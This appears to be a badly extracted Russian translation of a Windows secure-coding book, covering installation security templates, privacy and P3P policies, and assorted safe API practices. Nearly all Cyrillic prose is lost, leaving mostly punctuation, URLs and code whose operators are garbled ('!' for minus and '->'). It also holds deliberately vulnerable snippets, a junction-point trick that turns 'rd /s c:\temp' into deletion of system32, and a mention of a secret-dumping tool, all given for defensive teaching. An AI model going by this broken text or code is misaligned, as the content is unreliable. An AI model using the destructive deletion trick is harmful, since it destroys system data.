UNICODE . ,
.
, .
540
IV
. ,
,
.
.
.
, .
20
541
. :
542
IV
pUnicodeStr!>MaximumLength = 0;
}
:
, . :
20
543
. ,
, ,
.
:
, .
,
.
, . ,
, .
,
.
:
, :
szDATA != NULL
cbAllocSize 1! (
) highend 1 4 000 000 000.
: , .
,
, : ,
. , ,
.
strncpy, , (. 5).
,
, , , Imperso
nateNamedPipeClient. ,
,
.
:
544
IV
? recv 0,
TCP.
. , bytes
1 WriteFile
, hFile.
( 64
).
, ,
, .
AdjustTokenPrivileges. :
,
. ,
, GetLastError, ,
, :
ERROR_SUCCESS
ERROR_NOT_ALL_ASSIGNED
NewState .
. PreviousState
, , ,
, . , TRUE,
GetLastError ,
. . :
,
.
,
. ,
. C++ ,
, .. ,
, .
, ,
, ,
. , ( ,
) , ,
. . ,
,
:
20
545
struct blob
{
DWORD Size;
BYTE* Data;
};
, .
4 . Size,
. , ,
, ,
( ) .
, ,
. (Size)
.
Microsoft Office. ,
, .
,
.
, ,
,
, .
,
. , !
21
,
,
. ,
, ,
DoS,
,
.
,
. ,
.
, . ,
Windows 2000 ( ) Windows NT 4
Security Configuration Editor,
.
Internet
Security Scanner Internet Security Systems.
UNIX Windows NT, ,
.
.
, ,
,
21
547
DoS. ,
,
;
. ,
, ,
, , ,
.
, Windows 2000
.
,
, .
, ,
Windows 2000 ( ).
,
.
,
, CREATOR OWNER ().
?
.
,
.
. ,
HKEY_CUR
RENT_USER, HKEY_LOCAL_MACHINE.
, .
,
?
?
. Systems Management Server
(SMS) Remote Agent ,
, , .
( )
http://www.microsoft.com/technet/security/bulletin/fq00012.asp. ,
. ,
,
Local System,
.
Windows NT 4.0 AeDebug
. AeDebug ,
548
IV
.
, ,
( http://www.microsoft.com/Tech
Net/security/bulletin/fq00008.asp). ? .
, .
, Local System
DoS? ( ,
.) ,
!
,
SNMP (Simple Network Management Protocol) (
http://www.microsoft.com/TechNet/security/bulletin/fq00096.asp).
SNMP [ Security Not My
Problem ( )] ,
.
SNMP
(community string). ,
, ,
(
). , (sniffer),
, , .
, Para
meters, SNMP,
(, ). ,
, ,
SNMP SET , , .
, .
(
)
. , ,
, . ,
, .
:
.
,
. ,
(, ),
.
. ,
,
. ,
, .
. ,
21
549
:
. .
,
. , ,
: Program Files,
.
, Program Files , ,
, ,
NTFS.
,
. ,
ACL .
!
, .
, ,
.
, ,
,
.
, ,
[ Task Mana
ger ( )], .
, ,
!
(Security Configuration Editor)
Service Pack 4 Windows NT 4 Windows 2000
. Microsoft
(Microsoft Management Console, MMC) . ,
:
HKEY_LOCAL_MACHINE\Software. MMC
Security Templates ( ) Security Configuration and
Analysis ( ) (. 211).
(templates)
(security databases). ,
. Security Templates,
%<__>%\Security\Template
New Template ( ).
. , null.
. 212 MMC .
550
IV
. 211. / Security
Templates Security Configuration And Analysis
. 212.
MMC null
.
Security Configuration and Analysis
Open Database ( ).
; NewApp.sdb. Import
Template ( ) ,
. null (. 213).
.
,
. MMC (. 214),
null, Registry ()
Add Key ( ).
21
551
. 214.
[Unicode]
Unicode=yes
[Registry Values]
[Registry Keys]
"MACHINE\SOFTWARE\NewApp",0,"D:PAR(A;OICI;KA;;;BA)(A;CI;CCSWRC;;;WD) "
[File Security]
"E:\NewApp",0,"D:AR(A;OICI;FA;;;BA)(A;OICI;0x1f00e9;;;W D)"
[Version]
signature="$CHICAGO$"
Revision=1
552
IV
, (
E:\NewApp), %newapp_install%.
(. Secureco2\Chapter21\SecInstall).
/*
INF! ,
%newapp_install% ( )
.inf,
.
*/
#define UNICODE
#include <windows.h>
#include <stdio.h>
/*
,
! ,
, ,
.
*/
class SmartHandle
{
public:
SmartHandle()
{
Handle = INVALID_HANDLE_VALUE;
}
~SmartHandle()
{
if(IsValid())
{
CloseHandle(Handle);
}
}
bool IsValid(void)
{
if(Handle != INVALID_HANDLE_VALUE &&
Handle != NULL)
{
return true;
}
else
{
return false;
}
}
21
HANDLE Handle;
};
/*
UNICODE?
wmain main,
UNICODE.
*/
int wmain(int argc, WCHAR* argv[])
{
SmartHandle hInput;
SmartHandle hOutput;
SmartHandle hMap;
WCHAR* pFile;
WCHAR* pTmp;
WCHAR* pLast;
DWORD filesize;
DWORD dirlen;
if(argc != 4)
{
wprintf(L" : %s [ ]", argv[0]);
wprintf(L" [ ] [ ]\n");
return !1;
}
dirlen = wcslen(argv[3]);
hInput.Handle = CreateFile(argv[1],
GENERIC_READ,
0,
//
NULL, //
OPEN_EXISTING,
// ,
FILE_ATTRIBUTE_NORMAL, //
NULL);
//
if(!hInput.IsValid())
{
wprintf(L" %s\n", argv[1]);
return !1;
}
DWORD highsize = 0;
filesize = GetFileSize(hInput.Handle, &highsize);
if(highsize != 0 || filesize == ~0)
{
// 4
// INF! ???
553
554
IV
, ,
.
,
, .
hMap.Handle = CreateFileMapping(hInput.Handle, // .
NULL,
// .
PAGE_READONLY, // .
0,
//
0,
// !
// .
NULL);
// .
if(!hMap.IsValid())
{
wprintf(L" %s\n", argv[1]);
return !1;
}
// .
pFile = (WCHAR*)MapViewOfFile(hMap.Handle,
FILE_MAP_READ, 0, 0, 0);
if(pFile == NULL)
{
wprintf(L" %s\n", argv[1]);
return !1;
21
}
//
// .
pTmp = pLast = pFile;
DWORD subst_len = wcslen(L"%newapp_install%");
while(1)
{
DWORD written, bytes_out;
pTmp = wcsstr(pLast, L"%newapp_install%");
if(pTmp != NULL)
{
// .
// ?
bytes_out = (pTmp ! pLast) * sizeof(WCHAR);
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written )
{
wprintf(L" %s\n", argv[2 ]);
return !1;
}
// %newapp_install%
// .
if(!WriteFile(hOutput.Handle, argv[3],
dirlen * sizeof(WCHAR), &written, NULL) ||
dirlen * sizeof(WCHAR) != written)
{
wprintf(L" %s\n", argv[2]);
UnmapViewOfFile(pFile);
return !1;
}
pTmp += subst_len;
pLast = pTmp;
}
else
{
//
bytes_out = (BYTE*)pFile + filesize ! (BYTE*)pLast;
if(!WriteFile(hOutput.Handle, pLast, bytes_out,
&written, NULL) || bytes_out != written)
{
555
556
IV
API-
: ,
.
,
Windows NT.
API . Windows NT 4
API.
,
, . ,
AddAccessAlowedAce
ACE. ACE ,
21
557
AddAce, . ( AddAccess
AlowedAceEx, ACE,
Windows 2000 .)
API
,
http://www.windowsitsecurity.com/Articles/Index.cfm?Article
ID=9696. API,
.
: DACL
. DACL
.
, . DACL
. ACE
ACE.
Windows Installer
, Windows,
, Microsoft Platform SDK.
Platform SDK ,
, SDK ,
Guidelines for Authoring Secure Installations (
).
, .
,
.
Windows Installer
LockPermissions, ,
.
,
(private), (public) (restricted public).
,
, ,
.
.
Windows .
Windows Installer
. :
+ ,
.
. ,
,
.
558
IV
,
;
, .
.
,
. ,
,
Open
.
,
. Platform SDK.
(transforms).
. (
, ),
.
(custom actions)
, . ,
,
Windows Installer,
.
, ,
, msidbCustom
ActionTypeNoImpersonate
.
Windows Installer
, ,
,
. Windows Installer
, .
,
.
,
,
.
,
.
22
* (privacy)
. ,
.
,
,
, ,
.
, ,
.
, , ,
, .
!
. ,
.
, Porsche
? ,
. .
. ,
, ,
* . . .
560
IV
.
, ,
.
, .
,
. ,
. ,
. :
,
.
. ,
,
,
. :
. , .
.
.
, Web
. ,
. , ,
.
,
.
, .
, .
. ,
.
,
Records, Computers and the Rights of Citizens (,
), ,
1973 . (http://aspe.hhs.gov/datacncl/1973privacy/
tocprefacemembers.htm). , ,
, . 1998 .
22
561
(personally identifiable information,
PII) ,
. PII .
.
, .
TCP/IP
PII, .
PII,
.
1998 . (http://
www.cdt.org/privacy/eudirective/EU_Directive_.html), ,
PII.
PII ,
.
, .
2000 .
,
. ,
, .
(Safe Harbor Principles, http://www.export.gov/safeharbor/)
,
. , ,
,
, .
, ,
, . Web
(privacy statement),
.
, ,
.
, ,
, , ,
562
IV
, Web ,
.
. ,
,
.
, ,
,
. ,
,
,
. ,
. , CRM (Customer Relationship Mana
gement ),
(,
). ,
.
.
. ,
.
,
.
,
.
, ,
.
, ,
,
, .
,
.
, .
.
22
563
. ,
.
,
. ,
.
.
Web .
, .
, .
,
. . 221 ,
: BBBOnline (http://www.bbbonline.com), ESRB (http://
www.esrb.org/wp_join.asp) TRUSTe (http://www.truste.org/programs/ pub_how_to_
join.html).
. 221.
.
. 222
.
22-1.
URL-
(Computer
Fraud and Abuse Act, CFAA)
,
,
http://www4.law.cor
nell.edu/uscode/18/
1030.html
. . .
564
IV
22-1.
()
URL-
(GrammLeach Bliley Act,
GLBA)
.
,
http://www.senate.gov/
~banking/conf/
(Health Information
Portability Accountability
Act, HIPAA)
.
,
http://cms.hhs.gov/hipaa/
13
http://www.ftc.gov/opa/
1999/9910/childfinal.htm
,
.
, .
, , ,
.
.
.
, ,
. PII, ,
.
, . ,
,
. , :
;
;
;
,
;
:
Web;
22
565
;
.
(Chief Privacy Officer, CPO)
(privacy advocate) .
.
(Council of Chief Privacy Officers, http://www.conference
board.org/search/ dcouncil.cfm?councilsid=173) .
. 222
. CPO ,
.
, CPO
, .
. 222.
CPO ,
.
.
, , ,
.
, ,
. CPO
,
,
.
566
IV
, CPO.
, ,
.
:
;
;
;
,
;
;
,
.
,
Web ,
.
. ,
. ,
. , ,
, ,
. , ,
, .
,
.
, ,
(. 223).
, , ,
.
Web, ,
P3P (Platform for Privacy
Preferences) ( ). ,
cookie, ,
, , ,
.
.
22
567
,
,
. (,
) ,
.
.
,
SQM cookie-
. 223.
P3P
.
,
. ,
, .
.
,
.
1.
,
,
. ,
. ,
. . .
568
IV
, .
,
:
;
;
;
;
;
, ,
;
;
?
1.1.
,
: Web?
, ,
. ,
? , ?
, , .
1.2 Web-
Web,
: Web ?
?
? cookie,
. ,
.
. Web P3P?
, .
,
.
.
. ,
, .
Secureco2\Chapter22.
Web .
, .
22
569
,
,
. ,
.
.
,
. Web
TRUSTe (http://www.truste.org/ bus/pub_resourceguide.html)
, .
Microsoft http:/
/www.microsoft.com/info/privacy.htm.
P3P
Platform for Privacy Preferences (P3P) (http://www.w3.org/P3P) ,
W3C (World Wide Web Consortium)
Web ,
. ?
Internet Explorer 6,
(. 224).
P3P.
. 224.
Internet Explorer 6
, Web
.
, .
cookie .
P3P Web. Web
P3P ,
(Medium) . P3P
(.
P3P).
.
.
. ,
,
.
.
P3P
, P3P Web.
, P3P, ,
570
IV
. 225.
P3P
Web, P3P, ,
. 226. , .
TRUSTe
.
. 226.
P3P
P3P
. XML
. P3P.xml W3C,
Web. , Microsoft
http://www.microsoft.com/w3c/p3p.xml. :
22
571
<META xmlns="http://www.w3.org/2000/12/p3pv1">
<POLICY!REFERENCES>
<POLICY!REF about="Policy.xml">
<INCLUDE>\*</INCLUDE>
<COOKIE!INCLUDE name="*" value="*" domain="*" path="*"/>
</POLICY!REF>
</POLICY!REFERENCES>
</META>
Web, Internet Explo
rer 6 W3C Web, P3P.xml,
POLICYREF, XML
. ,
. .
XML .
discuri Web.
Internet Explorer 6 here.
Internet Explorer 6 .
Web
, .
. Web
, .
.
http://www.w3.org P3P.
<POLICY xmlns="http://www.w3.org/2000/12/p3pv1"
discuri="policy.htm"
opturi="http://msdn.microsoft.com/privacy">
<ENTITY>
<DATA!GROUP>
<DATA ref="#business.name">Microsoft</DATA>
<DATA ref="#business.contact!info.postal.street">One Microsoft Way
</DATA>
<DATA ref="#business.contact!info.postal.city">Redmond</DATA>
<DATA ref="#business.contact!info.postal.stateprov">WA</DATA>
<DATA ref="#business.contact!info.postal.postalcode">78052</DATA>
<DATA ref="#business.contact!info.postal.country">USA</DATA>
<DATA ref="#business.contact!info.online.email">michael</DATA>
<DATA ref="#business.contact!info.telecom.telephone.intcode">1
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.loccode">425
</DATA>
<DATA ref="#business.contact!info.telecom.telephone.number">
8828080</DATA>
</DATA!GROUP>
</ENTITY>
<ACCESS><nonident/></ACCESS>
<STATEMENT>
<PURPOSE><admin/><develop/></PURPOSE>
572
IV
<RECIPIENT><ours/></RECIPIENT>
<RETENTION><stated!purpose/></RETENTION>
<DATA!GROUP>
<DATA ref="#dynamic.clickstream.server"/>
<DATA ref="#dynamic.http.useragent"/>
</DATA!GROUP>
</STATEMENT>
<STATEMENT>
<PURPOSE><pseudo!analysis required="opt!in"/></PURPOSE>
<RECIPIENT><other!recipient/></RECIPIENT>
<RETENTION><indefinitely/></RETENTION>
<DATA!GROUP>
<DATA ref="#user.home!info.postal.postalcode">
<CATEGORIES><demographic/></CATEGORIES>
</DATA>
</DATA!GROUP>
</STATEMENT>
</POLICY>
Web, ,
. Internet Explo
rer 6 Privacy Report
View. Web
. , TRUSTe (http://www.truste.org/bus/pub_re
sourceguide.html).
. 227.
Internet Information Services (IIS)
. ,
Internet Explorer 6 ,
.
XML, ,
P3P. ( http://www.w3.org/TR/P3P/#compact_policies).
. 227 XML.
22
573
P3P
. P3P Web
(http://msdn.microsoft.com/workshop/security/privacy/
overview/createprivacypolicy.asp).
, ,
, ,
.
. ,
Web, .
Help (),
.
(software
development kit, SDK), Privacy Policy (
) , ,
, Web. Privacy Settings
( ) DLL,
, SDK.
. 228
Microsoft Windows Media Player 9 beta,
.
. 228.
Privacy Options
, ,
.
, ?
CRM.
. ,
574
IV
?
,
, (. 2210).
. 229.
. 2210.
, Web,
, .
, ,
?
, ,
,
.
22
575
, . ,
, .
, ! (:
!) , ,
, Web , ,
.
. ,
:
.
, ,
HCKU
.
Windows Media Player 7 ,
DVD Microsoft. :
,
. , , ,
, , .
,
, .
, ,
, .
,
,
.
,
.
, : ,
?
.
,
: ?
, ,
,
. , ,
, , .
,
.
576
IV
,
, . ,
,
.
.
. ,
,
. ,
. ,
. . . 2211 ,
,
. , ,
.
. 2211.
,
.
. ,
.
22
577
. , .
: ,
, , .
,
,
.
,
.
,
. , .
?
; ,
.
: ,
. ?
,
?
, . ,
. ,
, , . ,
,
.
, ,
.
. 2212 ,
.
SSL/TLS Web. Web
, IPSec.
,
. .
,
EDI (Electronic Data Interchange)
, .
.
. ,
.
.
578
IV
IPSec
IPSec
EDI
SSL/TLS
Web-
SSL/TLS
. 2212.
,
, .
,
.
.
,
. , ,
. ,
,
.
23
.
, ,
.
!
, ,
,
. , ,
. ,
: stuff.txt c:\secrets
tuff\docs, .
, ,
, ,
. : ,
,
, .
,
, .
580
IV
, UNIX, Microsoft
Windows NT .
,
. ?
,
Microsoft Windows ,
.
. ,
, SYSTEM,
. ,
, .
Windows
; , ,
, .
, ,
. Windows
.
,
, , .
,
, .
, SYSTEM
OpenWindowStation GetThreadDesktop,
.
Windows
.
, , RPC, ,
COM
(MessageBox) MB_SERVICE_NOTIFICATION.
.
, ACL ,
, (127.0.0.1).
,
:
,
LocalSystem
Security Configuration
Manager [Log on As ( ) Allow Service to interact with desktop
23
581
( ) HKLM\
CCS\Services\MyService\Type 0x0100 = 0x0100,
LoadLibrary GetProcAddress
.
CreateProcess , SYSTEM,
STARTUPINFO.lpDesktop
(Winsta0\Default).
,
Create
ProcessAsUser.
, .
.
LocalSystem
LocalSystem .
.
Windows 2000 , Windows 2000,
. ,
. ,
,
, Windows 2000
. API,
(, LogonUser), Windows XP
. LocalSystem,
,
. LocalSystem
: .
LocalSystem ,
.
582
IV
Network Service ( ) ,
Windows XP. ,
LocalSystem. LocalSystem,
( , ,
).
.
.
LocalService
LocalService Network Service,
. ,
. LocalSystem,
.
,
, , . ,
, ,
.
. ( )
Internet Security Systems, ,
. ,
Windows NT. ,
, .
,
,
.
,
,
.
, , ,
.
, ! , .
: !
, ,
.
, , ,
, Lsadump2, (Todd
Sabin) BindView. ,
. , , ,
, ,
23
583
. , Lsa
dump2 lsass. ,
.
,
.
.
,
, , ,
. ,
.
, ,
.
,
,
. ,
.
.
,
, ; ,
,
.
.
,
, .
.
, . ,
, ,
.
, .
.
, ,
, ,
. , Web
Server:. , ,
.
.
, .
584
IV
Web IIS 5
URLScan (http://www.microsoft.com/windows2000/downloads/recommended/
urlscan/default.asp).
, :
, ,
, .
, Ism.dll (,
.htr) IIS 5, , Splat.htr,
Error: The requested file could not be found ,
Ism.dll HTR.
, Ism.dll 404,
Web.
-
,
. 19.
!
,
, . ,
A, B, A
. ,
.
, . ,
. ,
. .
. , ,
.
, ,
Driver Verifier
Ntoskrnl.exe Hal.dll ,
.
Windows DDK, ,
23
585
.
Strsafe.h (. 5).
NTStrsafe.h
Windows XP SP 1 DDK (http:// www.microsoft.com/ddk/relnote
XPsp1.asp).
, ,
FILE_DEVICE_SECURE_OPEN.
, ,
. /
.
, DACL
, INF .
. AddReg [ClassIns
tall32] [DDInstall. HW] INF. , INF
, WHQL (Windows Hardware Quality Labs),
.
IoCreateDeviceSecure ( DDK
Microsoft Windows .NET Server 2003 Windows XP SP1)
,
(raw) ( ,
). Windows 2000
; Wdmsec.h
Wdmsec.dll.
, /
(input/output control, IOCTL) FILE_ANY_ACCESS.
.
IOCTL
IoValidateDeviceIoControlAccess ,
.
Windows 2000 Wdmsec.h.
Windows (Windows Management Instrumentation,
WMI) ,
: , .
Windows XP WMI
GUID , Windows .NET Server 2003
.
WMI , [DDInstall.WMI] ( DDK
Windows .NET Server 2003 Windows XP SP1) AddReg
SDDL.
.
, .
, .
586
IV
:
, ,
, . ,
, OBJ_KER
NEL_HANDLE .
,
.
,
. ,
. ,
, , ,
. , ,
,
,
, Zw*.
, ObReferenceObjectByHandle,
.
, ObReferenceObjectByHandle,
(
, ,
).
,
. , Windows NT
,
.
.
.
ExAllocatePoolWithQuotaTag, try/except.
,
.
. KeAc
quireSpinLock, .
, .
,
* , Zw,
ZwSignalAndWaitForSingleObject. . .
23
587
interlocked ExInterlockedInsertHeadList.
(deadlock).
.
, ,
IRQL_DISPATCH_LEVEL .
.
, , ,
.
, , ,
,
.
,
. ,
, , ,
, .
,
try/except , MmProbeAndLockPages
ProbeForRead,
try/except. .
588
IV
/:
/: Irp>MdlAddress NULL;
/: Irp>AssociatedIrp. SystemBuffer ;
/: Irp>UserBuffer ,
.
, / ProbeForRead ProbeForWrite
!
, / Windows ,
Irp>IoStatus. Information, , Irp>IoStatus. Status
. , Irp>IoStatus.Infor
mation, / ,
,
/. .
Irp>IoStatus. Status , ,
IoStack>Parameters.Read.Length. .
: 4 ,
8 ,
8 , / 4 8
4 .
, 8 4
, .
, /
, Irp>IoStatus.Status
( 0x800000000xBFFFFFFF).
(0xC00000000xFFFFFFFF) / .
IRP
. , STATUS_BUFFER_OVERFLOW (
), STATUS_BUFFER_TOO_SMALL (
).
/ (Memory Descrip
tor List, MDL),
.
,
.
,
.
,
,
.
,
, .
23
589
IRP-
,
IRP
/, / (IRP_MJ_CLEA
NUP). : IRP
. ,
IRP (
), .
.
/,
, ,
/ . ,
, ,
.
, ,
.
IRP ,
. IRP
IoCsqXxxx, CSQ.H.
IoSetStartIoAttributes
TRUE NonCancellable. ( Windows XP
.) ,
(startIo) IRP. ,
, ,
.
590
IV
:
?
?
.
. ( ,
, ).
// !
// , ( szParam)
// .
HFILE hFile = CreateFile(szParam,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
// .
}
,
.
,
. ,
, ,
. , ,
.
,
,
. :
.
,
, .
,
, .
,
23
591
.
. .
X.509 Microsoft Internet Explorer 5:
(. 231).
. 231.
Internet Explorer 5
, ,
: !
, ! ,
, No ,
Yes .
, Yes, . ,
: ,
, .
CreateProcess
CreateProcess, CreateProcess
AsUser, CreateProcessWithLogonW, ShellExecute WinExec, ,
? CreateProcess,
.
,
,
, , .
.
CreateProcess , , lpAppli
cationName lpCommandLine. ,
. Platform
SDK , lpApplicationName NULL,
, lpCom
mandLine. ( ) ,
. .
CreateProcess(NULL,
"C:\\Program Files\\MyDir\\MyApp.exe !p !a",
...);
592
IV
NULL lpApplicationName
NULL lpApplicationName,
,
.
lpApplicationName,
lpCommandLine.
CreateProcess:
CreateProcess("C:\\Program Files\\MyDir\\MyApp.exe",
"MyApp.exe !p !a",
...);
lpCommandLine
lpApplicationName NULL,
,
:
CreateProcess(NULL,
"\"C:\\Program Files\\MyDir\\MyApp.exe\" !p !a",
...);
23
593
( ) ,
CreateProcess ?
, ; ,
. Microsoft Windows
16 ,
. DLL
, DLL.
, ,
, DLL,
.
,
.
.dangersec. , ,
:
.def:
SECTIONS
.dangersec READ WRITE SHARED
a .h* .c*:
!SECTION:.dangersec, rws
, HOWTO: Share Data Between Different Mappings of a DLL
Knowledge Base ,
.
CreateFileMapping ACL.
,
,
, .
,
, SYSTEM ,
,
. .
,
.
594
IV
\Program Files
7, , , .
\Program Files , ACE
,
.
.
, : %<_
>%\My Documents, .
, \Documents
Settings\All Users\Application Data\<_>.
\Program Files ,
, Windows 95 Windows NT ,
, .
HKEY_LOCAL_MACHINE ; .
HKLM
\Program Files, HKEY_LOCAL_MACHINE
, ACL
[ Everyone ()]
.
HKEY_CURRENT_USER, .
FULL_CONTROL ALL_ACCESS
Windows NT 3.1 1993 .
, : ,
, ,
.
, ACL ,
.
,
Create. , ,
CreateNamedPipe CreateMutex, :
,
23
595
, ,
,
! ,
,
.
exploit
, ,
.
Microsoft Telnet,
, Predictable Name Pipes Could Enable Privilege Elevation
via Telnet (
Telnet) http://www.microsoft.com/technet/
security/bulletin/MS01031.asp. Telnet
, .
, Telnet
, , .
: ,
, .
,
, .
#ifndef FILE_FLAG_FIRST_PIPE_INSTANCE
# define FILE_FLAG_FIRST_PIPE_INSTANCE 0x00080000
#endif
int fCreatedOk = false;
HANDLE hPipe = CreateNamedPipe("\\\\.\\pipe\\MyCoolPipe",
PIPE_ACCESS_INBOUND | FILE_FLAG_FIRST_PIPE_INSTANCE ,
PIPE_TYPE_BYTE,
1,
2048,
2048,
NMPWAIT_USE_DEFAULT_WAIT,
NULL); //
if (hPipe != INVALID_HANDLE_VALUE) {
// , !
CloseHandle(hPipe);
fCreatedOk = true;
} else {
printf(" CreateNamedPipe %d", GetLastError());
}
return fCreatedOk;
FILE_FLAG_FIRST_PIPE_INSTANCE:
,
GetLastError . Windows 2000 SP 1.
, .
596
IV
.
,
DoS.
, ,
. ,
, .
CreateFile
Win32 CreateFile ,
, .
,
, , ! , ,
CreateFile, ,
GetFileType. ,
CreateFile
, ,
.
, ,
. ,
, (
)
.
dwFlagsAndAttributes
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
:
23
597
UNIX ,
.
Windows , ,
. ,
Windows.
, MandrakeUpdate
LinuxMandrake. , MandrakeUpdate,
/tmp.
. http://www.secu
rityfocus.com/bid/1567.
/tmp XFree86 4.0.1. ,
.
. http://www.securityfocus.com/bid/1430.
:
;
, ;
,
,
.
Windows
, GetTempPath GetTempFileName.
TMP TEMP
GetTempPath.
: GetTempFileName
, GetTempPath
, ACL.
, ,
,
598
IV
( C:\Temp) . Windows XP
, LocalService
NetworkService, .
, .
GetTempFileName ,
, !
GetTempFileName ,
.
(. Secureco2\Chapter23\CreatTempFile)
, ,
.
#include <windows.h>
HANDLE CreateTempFile(LPCTSTR szPrefix) {
// .
TCHAR szDir[MAX_PATH];
if (GetTempPath(sizeof(szDir)/ sizeof(TCHAR), szDir) == 0)
return NULL;
// .
TCHAR szFileName[MAX_PATH];
if (!GetTempFileName(szDir, szPrefix, 0, szFileName))
return NULL;
// .
HANDLE hTemp = CreateFile(szFileName,
GENERIC_READ | GENERIC_WRITE,
0,
// .
NULL, //
CREATE_ALWAYS,
FILE_ATTRIBUTE_TEMPORARY |
FILE_FLAG_DELETE_ON_CLOSE,
NULL);
return hTemp == INVALID_HANDLE_VALUE
? NULL
: hTemp;
}
int main() {
BOOL fRet = FALSE;
HANDLE h = CreateTempFile(TEXT("tmp"));
if (h) {
//
// .
//
23
599
CloseHandle(h);
}
return 0;
}
CreateFile. . 231 ,
.
23-1. CreateFile,
CREATE_ALWAYS
. , ,
,
.
FILE_ATTRIBUTE_TEMPORARY
FILE_FLAG_DELETE_ON_CLOSE
.
,
MoveFile
. , ,
FILE_FLAG_DELETE_ON_CLOSE.
Indexing Service ( ), ,
For fast searching, allow Indexing Service to index this folder (
) (. 232).
. 232.
, ,
,
. , CryptoAPI (.
Secureco2\Chapter23\CreateRandomPrefix).
600
IV
// CreateRandomPrefix.cpp
#include <windows.h>
#include <wincrypt.h>
#define PREFIX_SIZE (3)
DWORD GetRandomPrefix(TCHAR *szPrefix) {
HCRYPTPROV hProv = NULL;
DWORD dwErr = 0;
TCHAR *szValues =
TEXT("abcdefghijklmnopqrstuvwxyz0123456789");
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
return GetLastError();
size_t cbValues = lstrlen(szValues);
for (int i = 0; i < PREFIX_SIZE; i++) {
DWORD dwTemp;
CryptGenRandom(hProv, sizeof DWORD, (LPBYTE)&dwTemp);
szPrefix[i] = szValues[dwTemp % cbValues];
}
szPrefix[PREFIX_SIZE] = '\0';
if (hProv)
CryptReleaseContext(hProv, 0);
return dwErr;
}
EFS
(EFS), ,
Microsoft. ,
, %TEMP%,
.
EFS , ,
. EFS,
:
;
( dwFlagsAnd
Attributes CreateFile FILE_ATTRIBUTE_SYS
TEM);
, %TEMP% ( GetFileAttributes),
.
23
601
Windows 2000, NTFS (junc
tion). UNIX,
.
Linkd.exe, Windows Resource Kit.
,
. ,
. ,
, findstr /s.
Linkd.exe,
, c:\users\attacker c:\.
, c:\users, .
,
(, rd /s). ,
c:\temp\tempdir c:\windows\system32.
,
, rd /s c:\temp.
, ,
,
.
(reparse points),
,
FILE_REPARSE_POINT. ,
FILE_REPARSE_POINT.
, GetFileAttributes lpFindFileData>dwFileAttributes
FindFirstFile.
,
,
, .
:
, .
,
.
Web,
DHTML, .
, , Perl
.
, .
, Windows NT Windows XP IP
602
IV
. ,
TcpIp,
,
. IP
,
IP.
, ,
.
, , (
) .
,
. Microsoft
Visual Studio .NET, , ,
. , .
, ,
.
:
. ,
.
Windows Security Push
, Platform SDK:
Microsoft? : ,
.
!
,
, ,
: . ,
, .
:
. ? ,
,
? , !
,
. ,
,
. ,
.
23
603
,
,
,
.
,
, , ,
, .
. ,
C++ C#,
, .
. : , , C++,
COM .NET,
.
SID
, ,
,
,
(SID).
SID . SID,
, ?
PSID GetAdminSID() {
BOOL fSIDCreated = FALSE;
SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
PSID Admins;
fSIDCreated = AllocateAndInitializeSid(
&NtAuthority,
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
&Admins);
return fSIDCreated ? Admins : NULL;
}
BOOL fIsAnAdmin = FALSE;
PSID sidAdmin = GetAdminSID();
if (!sidAdmin) return;
if (GetTokenInformation(hToken,
TokenGroups,
ptokgrp,
dwInfoSize,
604
IV
&dwInfoSize)) {
for (int i = 0; i < ptokgrp!>GroupCount; i++) {
if (EqualSid(ptokgrp!>Groups[i].Sid, sidAdmin)){
fIsAnAdmin = TRUE;
break;
}
}
}
if (sidAdmin)
FreeSid(sidAdmin);
Windows 2000
. ,
, , SID
(denyonly SID),
. , TRUE ,
,
SID.
7.
:
Windows, 14 . Win
dows 2000 14 ,
Windows 2000 256
( NULL).
Windows XP Stored User
Names and Passwords ( ) (. 9).
_alloca
_alloca .
,
23
605
.
_alloca.
ATL
ATL, _alloca. A2W, W2A, CW2CT
. ,
. ,
.
ATL 7.0 Visual Studio .NET 2003
, ,
.
:
#include "atlconv.h"
...
LPWSTR szwString = CA2WEX<64>(szString);
, C# stackalloc, _alloca.
stackalloc ,
/unsafe, unsafe:
606
IV
!
, .
,
, .
,
, .
, #ifdef:
#ifdef INTERNAL_USE_ONLY
# ifndef _DEBUG
#
error "
"
# endif // _DEBUG
// ""
#endif // INTERNAL_USE_ONLY
:
,
.
,
, :
DNS NetBIOS ;
(,
);
, EXAIR\account account@explora
tionair.com.
DLL
, , : DLL
? ,
( ,
),
, .
(, ),
, DLL ,
, .
( .rc)
LANGUAGE.
23
607
,
.
, , ,
IIS ISA, ,
.
: ,
, .
.
: DNS NetBIOS ,
IP.
IP, , ,
IP ,
, . ,
: IP
, . ,
(NAT) ? IP ,
192.168.0.1. !
IP ,
,
.
Application Log ( )
. ,
, .
: Microsoft Windows .NET
Server 2003
. ACL
.
Application Log
.
,
. :
,
.
,
.
.
, ,
, ,
, .
, , ,
, , .
608
IV
C/C++
Microsoft
,
C C++, C# . ,
,
. DoS ,
. ,
.
24
,
Microsoft.
:
. , , ,
, ,
.
, , ,
,
!
,
.
, ,
, , , ,
, ,
.
,
.
, ,
,
610
IV
. , ,
, .
,
, , ,
. , , (,
) , ,
.
, ,
, , .
. , ,
,
,
.
,
,
.
, .
, , .
.
, .
,
, , .
, ,
,
.
.
.
, .
, ,
,
,
.
, . ,
, ,
,
.
.
. ,
.
24
611
, , .
. ,
, ,
, .
:
, .
, .
,
API .
,
, ,
API.
,
. ,
( , : ).
,
.
:
, ,
. , ,
.
, .
!
, , ,
, .
( ),
, ,
( ), .
.
,
SOAPServer.
612
IV
SOAPServer
SOAP.
SOAPServer
.
, (,
).
(,
).
,
.
, SOAP, .
.
SOAPServer
, , .
Encrypt Commu
nications .
TLS SOAPServer
.
, IPSec, TLS.
SOAP. SOAPServer
IP ,
.
.
: ,
,
(ACL) SOAP.
ACL,
Windows .NET Server Access Control List.
SOAPServer TCP 80 (
) 443 ( ).
SOAP ,
TCP
, SOAPServer.
SOAPServer ,
,
, .
,
.
,
. .
.
24
613
4: ISOAP_xxx
SOAPServer ISOAP_<_>,
,
. ,
